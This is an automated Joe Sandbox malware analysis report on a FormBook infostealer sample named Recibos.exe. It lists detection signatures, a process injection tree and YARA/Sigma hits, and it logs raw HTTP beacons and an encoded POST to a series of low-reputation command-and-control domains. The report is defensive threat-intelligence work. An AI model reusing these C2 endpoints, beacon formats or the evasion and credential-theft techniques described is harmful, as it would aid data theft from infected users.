Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Recibos.exe

Overview

General Information

Sample name:Recibos.exe
Analysis ID:1572310
MD5:654c0c7e931356faa0396f064994dc50
SHA1:633bb2be7c1d96741cb53e490ad8c4fa71becead
SHA256:4c197091ef6ff69cc1b9462d35d7a2652449fd8ce9e141222a9b08c920896e42
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • Recibos.exe (PID: 6584 cmdline: "C:\Users\user\Desktop\Recibos.exe" MD5: 654C0C7E931356FAA0396F064994DC50)
    • svchost.exe (PID: 2140 cmdline: "C:\Users\user\Desktop\Recibos.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • mGAzNmDsKUvf.exe (PID: 4340 cmdline: "C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • wlanext.exe (PID: 1196 cmdline: "C:\Windows\SysWOW64\wlanext.exe" MD5: 0D5F0A7CA2A8A47E3A26FB1CB67E118C)
          • mGAzNmDsKUvf.exe (PID: 4944 cmdline: "C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1860 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.2046668076.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.2047021260.00000000030C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4106577645.0000000003110000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000001.00000002.2047577795.0000000003750000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000007.00000002.4108279577.0000000004B00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Recibos.exe", CommandLine: "C:\Users\user\Desktop\Recibos.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Recibos.exe", ParentImage: C:\Users\user\Desktop\Recibos.exe, ParentProcessId: 6584, ParentProcessName: Recibos.exe, ProcessCommandLine: "C:\Users\user\Desktop\Recibos.exe", ProcessId: 2140, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Recibos.exe", CommandLine: "C:\Users\user\Desktop\Recibos.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Recibos.exe", ParentImage: C:\Users\user\Desktop\Recibos.exe, ParentProcessId: 6584, ParentProcessName: Recibos.exe, ProcessCommandLine: "C:\Users\user\Desktop\Recibos.exe", ProcessId: 2140, ProcessName: svchost.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: Recibos.exeReversingLabs: Detection: 66%
            Yara detected FormBook
            Source: Yara matchFile source: 00000001.00000002.2046668076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2047021260.00000000030C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4106577645.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2047577795.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4108279577.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4105404041.0000000002C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4106632902.0000000003160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4106506329.0000000003160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Recibos.exeJoe Sandbox ML: detected
            Source: Recibos.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mGAzNmDsKUvf.exe, 00000005.00000000.1965550701.000000000075E000.00000002.00000001.01000000.00000005.sdmp, mGAzNmDsKUvf.exe, 00000007.00000002.4106034961.000000000075E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000001.00000002.2047093516.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1942081234.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1943810696.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2047093516.000000000359E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.2049269138.0000000003285000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.4106842688.00000000035CE000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.2047031631.00000000030D8000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.4106842688.0000000003430000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, 00000001.00000002.2047093516.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1942081234.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1943810696.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2047093516.000000000359E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.2049269138.0000000003285000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.4106842688.00000000035CE000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.2047031631.00000000030D8000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.4106842688.0000000003430000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wlanext.pdb source: svchost.exe, 00000001.00000003.2014714702.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2015780002.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp, mGAzNmDsKUvf.exe, 00000005.00000002.4106011668.0000000001508000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wlanext.pdbGCTL source: svchost.exe, 00000001.00000003.2014714702.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2015780002.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp, mGAzNmDsKUvf.exe, 00000005.00000002.4106011668.0000000001508000.00000004.00000020.00020000.00000000.sdmp

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.logidant.xyz
            Source: DNS query: www.egyshare.xyz
            Source: Joe Sandbox ViewIP Address: 45.141.156.114 45.141.156.114
            Source: Joe Sandbox ViewIP Address: 209.74.77.108 209.74.77.108
            Source: Joe Sandbox ViewASN Name: YURTEH-ASUA YURTEH-ASUA
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /alo6/?pFYX4n=s1RhBgSSc/k3T0jZ1doZ5DvPRukmOUUc25RslsirlG2uVcm1vZZrQ7zhNnD/cyUNeUvgDkKIi8l9eWRRC/1ChPSgyQz5bywIt0FyKoJ7XnLAe/FH9kjFmmE=&rr7x1=pT0pWliPV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.1secondlending.oneUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /ctvu/?pFYX4n=306z4jMFZ8cLvHYZzZU9cUs0vQ86MCVOzz9oMF1ntEZl1SQIBC+VKPA8lqMh/UdrcskgnhZVBAq8zTFw0YpHZLk0gMEW/A5vkbohwDElcVcFHGXrgZJpQIM=&rr7x1=pT0pWliPV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.logidant.xyzUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /bryf/?rr7x1=pT0pWliPV&pFYX4n=CAZjXQbNTKeWQTQirDs1igUBzSQld6T1UeVU1dDfkJwpgmj9+23WxzoueliXKU0GrnZ7rAlARHmYQrQtVPfpR7ul/yvYu09c5TuBMIpg21kSx+UgpigqKqQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.wcq77.topUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /grm8/?pFYX4n=LXeIWcjRI+0vwDaWL9fWp1e5SYfZj51vPQ+DeJcDhGcq3DSHHwCG/Mepb2eQXiRJ2aihtUY8szHS/Cbz5IjtUJQdZlknt7OQMPZ7VewdY2i1/aDXKfCCmB0=&rr7x1=pT0pWliPV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.mindfulmo.lifeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /z7sc/?pFYX4n=lpyE2AbPqI/20nbLdgQLpDIVfBauxh+/nj7uqY0yeMpYT6Ph3E36c6D0EpnRPNVSfUYtH00jj9MWE9I4iZUmSEZjfY8EepRiDIFeNjKsgcauBuStZyRsOkE=&rr7x1=pT0pWliPV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.bienmaigrir.infoUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /983l/?pFYX4n=g8WLTYlf9hWOZIADhafhbAM9O+SGnRJzmTuFWyAeHkX1YMY2d2zKbSbTvvKDd0IL0E8lOJWyqcUo2Xu9lNGbM39YcrByqJbp3VLwmzLRU+Qq6DSKHXwmpHA=&rr7x1=pT0pWliPV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.exitomagnetico.onlineUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /xz45/?pFYX4n=7Gl4eI2ymk7esmTKiyocBpF5qhx3QEeonx7jFa75SCeEQi1G+RGQY0LgPCeJyXg2C6GorcwS5UbL8Y/pt3QrWo2hcBs/CYK05Fwqw3imWS0YPWk6eLj68dM=&rr7x1=pT0pWliPV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.bcg.servicesUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /1a34/?rr7x1=pT0pWliPV&pFYX4n=UhEylRAMCxjlfkeBHdFlA8MxzAi/en4irJRYrSpl2vEmDrtdD83fz84LtzcmrW6WKOP6wZH/8TlB0y+yX7XcsnikQaxLyzpTE5F2560XH3FMkHnsZc7Ll0Y= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.mffnow.infoUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /hrap/?pFYX4n=+wfvU+r0fXNkfp8ouz3K6IfbsPoraFQS1hMsf4OYg5wyJviJ8QUrWR8xRt/3ckLtqjVE/R9SKLQENxs3rgGq786i5xTgYLx/0ho5ZVxAsh3OM1RI6yAeR+s=&rr7x1=pT0pWliPV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.remedies.proUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /fvpb/?pFYX4n=kyx71FegbxK9t49DmoExIvfgnNE2IR3bNVDNoxjcJXBTC458PtiM+MxjOLvzJIevsVCTQRubdLAqQTQOooLJWJpRZPL/EUuZT3AOIoIvixzKtl+SfRe7kEU=&rr7x1=pT0pWliPV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.caj-bioteaque.onlineUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /dp98/?pFYX4n=lwprcyOja05feUKXFvnvYGtkNDFrKAw8VdIAG4o6xNOQV3h7ueUE8JDK3GM5Ot7MjRI5G4LHbCuOcNDiB82RYmuufXO00YnTFg6+rJQDeGaEe3laXqmfCqk=&rr7x1=pT0pWliPV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.qqa79.topUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
            Source: global trafficDNS traffic detected: DNS query: www.1secondlending.one
            Source: global trafficDNS traffic detected: DNS query: www.logidant.xyz
            Source: global trafficDNS traffic detected: DNS query: www.wcq77.top
            Source: global trafficDNS traffic detected: DNS query: www.mindfulmo.life
            Source: global trafficDNS traffic detected: DNS query: www.bienmaigrir.info
            Source: global trafficDNS traffic detected: DNS query: www.exitomagnetico.online
            Source: global trafficDNS traffic detected: DNS query: www.betmatchx.online
            Source: global trafficDNS traffic detected: DNS query: www.bcg.services
            Source: global trafficDNS traffic detected: DNS query: www.mffnow.info
            Source: global trafficDNS traffic detected: DNS query: www.remedies.pro
            Source: global trafficDNS traffic detected: DNS query: www.caj-bioteaque.online
            Source: global trafficDNS traffic detected: DNS query: www.qqa79.top
            Source: global trafficDNS traffic detected: DNS query: www.egyshare.xyz
            Source: unknownHTTP traffic detected: POST /ctvu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Cache-Control: no-cacheContent-Length: 203Connection: closeContent-Type: application/x-www-form-urlencodedHost: www.logidant.xyzOrigin: http://www.logidant.xyzReferer: http://www.logidant.xyz/ctvu/User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)Data Raw: 70 46 59 58 34 6e 3d 36 32 53 54 37 57 34 47 55 64 56 76 7a 44 56 46 78 71 42 4d 64 47 41 6c 70 67 70 76 63 51 52 38 78 68 67 6a 62 57 74 37 38 56 70 44 36 68 52 42 65 41 32 47 61 39 6c 64 71 75 6b 62 79 47 5a 4b 51 64 6b 6e 6f 7a 78 54 49 32 36 65 69 43 41 39 68 64 46 77 58 4a 35 52 73 66 4d 45 74 33 77 38 75 6f 74 48 34 44 49 44 62 6d 52 59 44 48 48 70 77 5a 41 44 51 66 52 42 57 57 62 4a 41 33 4c 33 49 66 36 4e 6f 62 51 72 47 41 4f 45 6a 73 43 33 4a 32 72 30 53 4a 6c 74 43 4f 76 56 67 41 54 39 45 65 6c 59 56 34 58 71 72 58 46 68 77 74 6b 4f 48 75 2f 50 47 2b 46 63 78 4f 66 49 68 69 7a 4f 57 51 3d 3d Data Ascii: pFYX4n=62ST7W4GUdVvzDVFxqBMdGAlpgpvcQR8xhgjbWt78VpD6hRBeA2Ga9ldqukbyGZKQdknozxTI26eiCA9hdFwXJ5RsfMEt3w8uotH4DIDbmRYDHHpwZADQfRBWWbJA3L3If6NobQrGAOEjsC3J2r0SJltCOvVgAT9EelYV4XqrXFhwtkOHu/PG+FcxOfIhizOWQ==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 11:17:42 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 11:17:59 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 11:18:02 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 11:18:05 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 11:18:07 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 11:18:15 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a7b148-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 11:18:23 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a7b148-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 11:18:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 